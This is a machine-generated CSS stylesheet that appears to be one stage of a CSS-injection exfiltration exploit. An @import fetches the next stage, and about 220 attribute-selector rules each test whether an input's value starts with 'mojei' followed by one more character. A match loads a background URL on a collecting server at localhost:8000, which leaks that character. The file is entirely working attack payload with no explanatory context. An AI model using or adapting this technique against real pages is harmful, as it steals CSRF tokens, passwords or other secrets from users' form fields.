@import url("http://localhost:8000/?l=7");
input[value="mojei!"] {background: url("http://localhost:8000/?leak=!&q=0.0031510403746859428");}
input[value="mojei\""] {background: url("http://localhost:8000/?leak=\"&q=0.34881962619328677");}
input[value="mojei#"] {background: url("http://localhost:8000/?leak=#&q=0.9486092771283845");}
input[value="mojei$"] {background: url("http://localhost:8000/?leak=$&q=0.4512083405804608");}
input[value="mojei%"] {background: url("http://localhost:8000/?leak=%&q=0.9851160768070277");}
input[value="mojei&"] {background: url("http://localhost:8000/?leak=&&q=0.38894154476958787");}
input[value="mojei'"] {background: url("http://localhost:8000/?leak='&q=0.579667007116802");}
input[value="mojei("] {background: url("http://localhost:8000/?leak=(&q=0.24402773851065374");}
input[value="mojei)"] {background: url("http://localhost:8000/?leak=)&q=0.3011321265958389");}
input[value="mojei*"] {background: url("http://localhost:8000/?leak=*&q=0.7317266882986879");}
input[value="mojei+"] {background: url("http://localhost:8000/?leak=+&q=0.32384168063402297");}
input[value="mojei,"] {background: url("http://localhost:8000/?leak=,&q=0.1848273907710527");}
input[value="mojei-"] {background: url("http://localhost:8000/?leak=-&q=0.3830867427188409");}
input[value="mojei."] {background: url("http://localhost:8000/?leak=.&q=0.6613225407216874");}
input[value="mojei/"] {background: url("http://localhost:8000/?leak=/&q=0.75657543280542");}
input[value="mojei0"] {background: url("http://localhost:8000/?leak=0&q=0.41047915016455283");}
input[value="mojei1"] {background: url("http://localhost:8000/?leak=1&q=0.1465582250369395");}
input[value="mojei2"] {background: url("http://localhost:8000/?leak=2&q=0.7160094803807897");}
input[value="mojei3"] {background: url("http://localhost:8000/?leak=3&q=0.8692341221827051");}
input[value="mojei4"] {background: url("http://localhost:8000/?leak=4&q=0.11455747808608452");}
input[value="mojei5"] {background: url("http://localhost:8000/?leak=5&q=0.3085699014757819");}
input[value="mojei6"] {background: url("http://localhost:8000/?leak=6&q=0.33520260047437134");}
input[value="mojei7"] {background: url("http://localhost:8000/?leak=7&q=0.6311227618561108");}
input[value="mojei8"] {background: url("http://localhost:8000/?leak=8&q=0.5942545728131421");}
input[value="mojei9"] {background: url("http://localhost:8000/?leak=9&q=0.051465970270133");}
input[value="mojei:"] {background: url("http://localhost:8000/?leak=:&q=0.9106257795769099");}
input[value="mojei;"] {background: url("http://localhost:8000/?leak=;&q=0.6605182659744215");}
input[value="mojei<"] {background: url("http://localhost:8000/?leak=<&q=0.26828545628237377");}
input[value="mojei="] {background: url("http://localhost:8000/?leak==&q=0.3953395801413693");}
input[value="mojei>"] {background: url("http://localhost:8000/?leak=>&q=0.6179342852289396");}
input[value="mojei?"] {background: url("http://localhost:8000/?leak=?&q=0.562632607451556");}
input[value="mojei@"] {background: url("http://localhost:8000/?leak=@&q=0.6790992939065579");}
input[value="mojeiA"] {background: url("http://localhost:8000/?leak=A&q=0.594235479680937");}
input[value="mojeiB"] {background: url("http://localhost:8000/?leak=B&q=0.929424762306372");}
input[value="mojeiC"] {background: url("http://localhost:8000/?leak=C&q=0.12328003118269404");}
input[value="mojeiD"] {background: url("http://localhost:8000/?leak=D&q=0.7451205781046064");}
input[value="mojeiE"] {background: url("http://localhost:8000/?leak=E&q=0.828409052649999");}
input[value="mojeiF"] {background: url("http://localhost:8000/?leak=F&q=0.5414719020173202");}
input[value="mojeiG"] {background: url("http://localhost:8000/?leak=G&q=0.590568561111495");}
input[value="mojeiH"] {background: url("http://localhost:8000/?leak=H&q=0.20680734300406756");}
input[value="mojeiI"] {background: url("http://localhost:8000/?leak=I&q=0.2921242363582741");}
input[value="mojeiJ"] {background: url("http://localhost:8000/?leak=J&q=0.5352706380948224");}
input[value="mojeiK"] {background: url("http://localhost:8000/?leak=K&q=0.23764086763249992");}
input[value="mojeiL"] {background: url("http://localhost:8000/?leak=L&q=0.5558892321582507");}
input[value="mojeiM"] {background: url("http://localhost:8000/?leak=M&q=0.8145046850770563");}
input[value="mojeiN"] {background: url("http://localhost:8000/?leak=N&q=0.8503649872439261");}
input[value="mojeiO"] {background: url("http://localhost:8000/?leak=O&q=0.956353048471297");}
input[value="mojeiP"] {background: url("http://localhost:8000/?leak=P&q=0.7413640780072714");}
input[value="mojeiQ"] {background: url("http://localhost:8000/?leak=Q&q=0.26829880552598695");}
input[value="mojeiR"] {background: url("http://localhost:8000/?leak=R&q=0.7109763880555755");}
input[value="mojeiS"] {background: url("http://localhost:8000/?leak=S&q=0.27515567605775715");}
input[value="mojeiT"] {background: url("http://localhost:8000/?leak=T&q=0.6404899766278658");}
input[value="mojeiU"] {background: url("http://localhost:8000/?leak=U&q=0.45713974104424104");}
input[value="mojeiV"] {background: url("http://localhost:8000/?leak=V&q=0.8472876437137968");}
input[value="mojeiW"] {background: url("http://localhost:8000/?leak=W&q=0.7528120719853408");}
input[value="mojeiX"] {background: url("http://localhost:8000/?leak=X&q=0.5798375360018186");}
input[value="mojeiY"] {background: url("http://localhost:8000/?leak=Y&q=0.27703862598436046");}
input[value="mojeiZ"] {background: url("http://localhost:8000/?leak=Z&q=0.5358755847911503");}
input[value="mojei["] {background: url("http://localhost:8000/?leak=[&q=0.8098311931421303");}
input[value="mojei\\"] {background: url("http://localhost:8000/?leak=\\&q=0.7404235475263441");}
input[value="mojei]"] {background: url("http://localhost:8000/?leak=]&q=0.2264599403534291");}
input[value="mojei^"] {background: url("http://localhost:8000/?leak=^&q=0.3440905972862225");}
input[value="mojei_"] {background: url("http://localhost:8000/?leak=_&q=0.7090634660575585");}
input[value="mojei`"] {background: url("http://localhost:8000/?leak=`&q=0.5985162549049345");}
input[value="mojeia"] {background: url("http://localhost:8000/?leak=a&q=0.5991004021736397");}
input[value="mojeib"] {background: url("http://localhost:8000/?leak=b&q=0.6830177787386018");}
input[value="mojeic"] {background: url("http://localhost:8000/?leak=c&q=0.6904110446878282");}
input[value="mojeid"] {background: url("http://localhost:8000/?leak=d&q=0.11083936963430707");}
input[value="mojeie"] {background: url("http://localhost:8000/?leak=e&q=0.8973066265141119");}
input[value="mojeif"] {background: url("http://localhost:8000/?leak=f&q=0.42000088537210556");}
input[value="mojeig"] {background: url("http://localhost:8000/?leak=g&q=0.4869313429976303");}
input[value="mojeih"] {background: url("http://localhost:8000/?leak=h&q=0.9061100663998303");}
input[value="mojeii"] {background: url("http://localhost:8000/?leak=i&q=0.7429130485118978");}
input[value="mojeij"] {background: url("http://localhost:8000/?leak=j&q=0.026893952096917584");}
input[value="mojeik"] {background: url("http://localhost:8000/?leak=k&q=0.8652682696037608");}
input[value="mojeil"] {background: url("http://localhost:8000/?leak=l&q=0.5482147641194282");}
input[value="mojeim"] {background: url("http://localhost:8000/?leak=m&q=0.004675960905227372");}
input[value="mojein"] {background: url("http://localhost:8000/?leak=n&q=0.16537943727233362");}
input[value="mojeio"] {background: url("http://localhost:8000/?leak=o&q=0.01123259491138251");}
input[value="mojeip"] {background: url("http://localhost:8000/?leak=p&q=0.8360472917348585");}
input[value="mojeiq"] {background: url("http://localhost:8000/?leak=q&q=0.8470988321310495");}
input[value="mojeir"] {background: url("http://localhost:8000/?leak=r&q=0.8895979987968732");}
input[value="mojeis"] {background: url("http://localhost:8000/?leak=s&q=0.6194017635875522");}
input[value="mojeit"] {background: url("http://localhost:8000/?leak=t&q=0.49021771172741735");}
input[value="mojeiu"] {background: url("http://localhost:8000/?leak=u&q=0.7074239437661516");}
input[value="mojeiv"] {background: url("http://localhost:8000/?leak=v&q=0.9976488083830743");}
input[value="mojeiw"] {background: url("http://localhost:8000/?leak=w&q=0.9177121377248334");}
input[value="mojeix"] {background: url("http://localhost:8000/?leak=x&q=0.16963264212868912");}
input[value="mojeiy"] {background: url("http://localhost:8000/?leak=y&q=0.960222447278889");}
input[value="mojeiz"] {background: url("http://localhost:8000/?leak=z&q=0.42204599017025823");}
input[value="mojei{"] {background: url("http://localhost:8000/?leak={&q=0.8790794268788158");}
input[value="mojei|"] {background: url("http://localhost:8000/?leak=|&q=0.6491216170960787");}
input[value="mojei}"] {background: url("http://localhost:8000/?leak=}&q=0.5544492960156358");}
input[value="mojei~"] {background: url("http://localhost:8000/?leak=~&q=0.9120578756997859");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.08385774159884685");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.7550802874193199");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.23995297209873367");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.48472595097028326");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.7759200803537001");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.2007017027069049");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.011360818861889888");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.6421752870368396");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.9644977100418546");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.043656853799976414");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.9170570639352595");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.6881242604514093");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.4369259558866514");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.7172039614089047");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.6940930954467726");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.974350689575475");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.15378452841587653");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.5765359567134285");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.08110883675853686");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.48973334332782437");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.43360376360417185");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.10182889165741837");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.37573976063374315");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.8379511155903401");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.551294128857521");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.07581791751544653");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.899420099542122");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.7816671174827057");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.09815826722884058");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.4933785020955912");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.3043279753999031");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.9053722727356295");}
input[value="mojei"] {background: url("http://localhost:8000/?leak=&q=0.5980434414702842");}
input[value="mojei "] {background: url("http://localhost:8000/?leak= &q=0.8951013897478486");}
input[value="mojei¡"] {background: url("http://localhost:8000/?leak=¡&q=0.48803318105101723");}
input[value="mojei¢"] {background: url("http://localhost:8000/?leak=¢&q=0.7755510568131008");}
input[value="mojei£"] {background: url("http://localhost:8000/?leak=£&q=0.7406552399072013");}
input[value="mojei¤"] {background: url("http://localhost:8000/?leak=¤&q=0.12772885742744555");}
input[value="mojei¥"] {background: url("http://localhost:8000/?leak=¥&q=0.9442992726209163");}
input[value="mojei¦"] {background: url("http://localhost:8000/?leak=¦&q=0.25693362703445133");}
input[value="mojei§"] {background: url("http://localhost:8000/?leak=§&q=0.4430139572536451");}
input[value="mojei¨"] {background: url("http://localhost:8000/?leak=¨&q=0.8396304142477387");}
input[value="mojei©"] {background: url("http://localhost:8000/?leak=©&q=0.10984649687211756");}
input[value="mojeiª"] {background: url("http://localhost:8000/?leak=ª&q=0.590669672226066");}
input[value="mojei«"] {background: url("http://localhost:8000/?leak=«&q=0.7188471801023149");}
input[value="mojei¬"] {background: url("http://localhost:8000/?leak=¬&q=0.893733708746673");}
input[value="mojei­"] {background: url("http://localhost:8000/?leak=­&q=0.4825991909089218");}
input[value="mojei®"] {background: url("http://localhost:8000/?leak=®&q=0.5940147631086339");}
input[value="mojei¯"] {background: url("http://localhost:8000/?leak=¯&q=0.23425616148852102");}
input[value="mojei°"] {background: url("http://localhost:8000/?leak=°&q=0.2484036540577308");}
input[value="mojei±"] {background: url("http://localhost:8000/?leak=±&q=0.025137419741836142");}
input[value="mojei²"] {background: url("http://localhost:8000/?leak=²&q=0.45068993348234865");}
input[value="mojei³"] {background: url("http://localhost:8000/?leak=³&q=0.864911501418596");}
input[value="mojei´"] {background: url("http://localhost:8000/?leak=´&q=0.23259680342703293");}
input[value="mojeiµ"] {background: url("http://localhost:8000/?leak=µ&q=0.9025211306024998");}
input[value="mojei¶"] {background: url("http://localhost:8000/?leak=¶&q=0.16055125058213426");}
input[value="mojei·"] {background: url("http://localhost:8000/?leak=·&q=0.3111196530847582");}
input[value="mojei¸"] {background: url("http://localhost:8000/?leak=¸&q=0.3417103494211333");}
input[value="mojei¹"] {background: url("http://localhost:8000/?leak=¹&q=0.23993136905825363");}
input[value="mojeiº"] {background: url("http://localhost:8000/?leak=º&q=0.9551415360609647");}
input[value="mojei»"] {background: url("http://localhost:8000/?leak=»&q=0.36046068934877584");}
input[value="mojei¼"] {background: url("http://localhost:8000/?leak=¼&q=0.1361865711721244");}
input[value="mojei½"] {background: url("http://localhost:8000/?leak=½&q=0.8086612409820495");}
input[value="mojei¾"] {background: url("http://localhost:8000/?leak=¾&q=0.8150526387262467");}
input[value="mojei¿"] {background: url("http://localhost:8000/?leak=¿&q=0.5140311088018441");}
input[value="mojeiÀ"] {background: url("http://localhost:8000/?leak=À&q=0.6255304857943704");}
input[value="mojeiÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.5100064683481704");}
input[value="mojeiÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.24063940355750124");}
input[value="mojeiÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.09523672655028292");}
input[value="mojeiÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.7444980871234785");}
input[value="mojeiÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.923280501383692");}
input[value="mojeiÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.3975048990696399");}
input[value="mojeiÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.17232146600305898");}
input[value="mojeiÈ"] {background: url("http://localhost:8000/?leak=È&q=0.23175460561567784");}
input[value="mojeiÉ"] {background: url("http://localhost:8000/?leak=É&q=0.9658476228281947");}
input[value="mojeiÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.8055438962783759");}
input[value="mojeiË"] {background: url("http://localhost:8000/?leak=Ë&q=0.17659296561324833");}
input[value="mojeiÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.32188331570440476");}
input[value="mojeiÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.7720242004285354");}
input[value="mojeiÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.3703096602785263");}
input[value="mojeiÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.8358826742519541");}
input[value="mojeiÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.8140622559173183");}
input[value="mojeiÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.6664734384615061");}
input[value="mojeiÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.3182114820421955");}
input[value="mojeiÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.7902248972603936");}
input[value="mojeiÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.2728885181847194");}
input[value="mojeiÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.8468464158744669");}
input[value="mojeiÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.3194321694674449");}
input[value="mojei×"] {background: url("http://localhost:8000/?leak=×&q=0.9049706993019728");}
input[value="mojeiØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.6077889985668781");}
input[value="mojeiÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.76250650569311");}
input[value="mojeiÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.9515446796046769");}
input[value="mojeiÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.10304714219534161");}
input[value="mojeiÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.030746565151177574");}
input[value="mojeiÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.053055272222454875");}
input[value="mojeiÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.0012408503104779367");}
input[value="mojeiß"] {background: url("http://localhost:8000/?leak=ß&q=0.22617133927298494");}
input[value="mojeià"] {background: url("http://localhost:8000/?leak=à&q=0.03827520346618596");}
input[value="mojeiá"] {background: url("http://localhost:8000/?leak=á&q=0.6211485052508763");}
input[value="mojeiâ"] {background: url("http://localhost:8000/?leak=â&q=0.8342985823414351");}
input[value="mojeiã"] {background: url("http://localhost:8000/?leak=ã&q=0.5034111824652578");}
input[value="mojeiä"] {background: url("http://localhost:8000/?leak=ä&q=0.19118922857892606");}
input[value="mojeiå"] {background: url("http://localhost:8000/?leak=å&q=0.9100227664349512");}
input[value="mojeiæ"] {background: url("http://localhost:8000/?leak=æ&q=0.7817660320110382");}
input[value="mojeiç"] {background: url("http://localhost:8000/?leak=ç&q=0.2631321373064228");}
input[value="mojeiè"] {background: url("http://localhost:8000/?leak=è&q=0.1915253125514491");}
input[value="mojeié"] {background: url("http://localhost:8000/?leak=é&q=0.039153354896742654");}
input[value="mojeiê"] {background: url("http://localhost:8000/?leak=ê&q=0.17072269982260568");}
input[value="mojeië"] {background: url("http://localhost:8000/?leak=ë&q=0.9973593793056261");}
input[value="mojeiì"] {background: url("http://localhost:8000/?leak=ì&q=0.5725084818164159");}
input[value="mojeií"] {background: url("http://localhost:8000/?leak=í&q=0.940909424676474");}
input[value="mojeiî"] {background: url("http://localhost:8000/?leak=î&q=0.7323939368062444");}
input[value="mojeiï"] {background: url("http://localhost:8000/?leak=ï&q=0.8599964917904575");}
input[value="mojeið"] {background: url("http://localhost:8000/?leak=ð&q=0.12369119891273406");}
input[value="mojeiñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.02522191534419016");}
input[value="mojeiò"] {background: url("http://localhost:8000/?leak=ò&q=0.20106431589784202");}
input[value="mojeió"] {background: url("http://localhost:8000/?leak=ó&q=0.23958850663375575");}
input[value="mojeiô"] {background: url("http://localhost:8000/?leak=ô&q=0.3196614051600828");}
input[value="mojeiõ"] {background: url("http://localhost:8000/?leak=õ&q=0.3400593130403824");}
input[value="mojeiö"] {background: url("http://localhost:8000/?leak=ö&q=0.1410389992027834");}
input[value="mojei÷"] {background: url("http://localhost:8000/?leak=÷&q=0.15361015481101004");}
input[value="mojeiø"] {background: url("http://localhost:8000/?leak=ø&q=0.35289232110897606");}
input[value="mojeiù"] {background: url("http://localhost:8000/?leak=ù&q=0.7302925246790306");}
input[value="mojeiú"] {background: url("http://localhost:8000/?leak=ú&q=0.07551107307741023");}
input[value="mojeiû"] {background: url("http://localhost:8000/?leak=û&q=0.9796641082345341");}
input[value="mojeiü"] {background: url("http://localhost:8000/?leak=ü&q=0.5472945392974593");}
input[value="mojeiý"] {background: url("http://localhost:8000/?leak=ý&q=0.7598942756961464");}
input[value="mojeiþ"] {background: url("http://localhost:8000/?leak=þ&q=0.05544831453570831");}
input[value="mojeiÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.9419703831716186");}
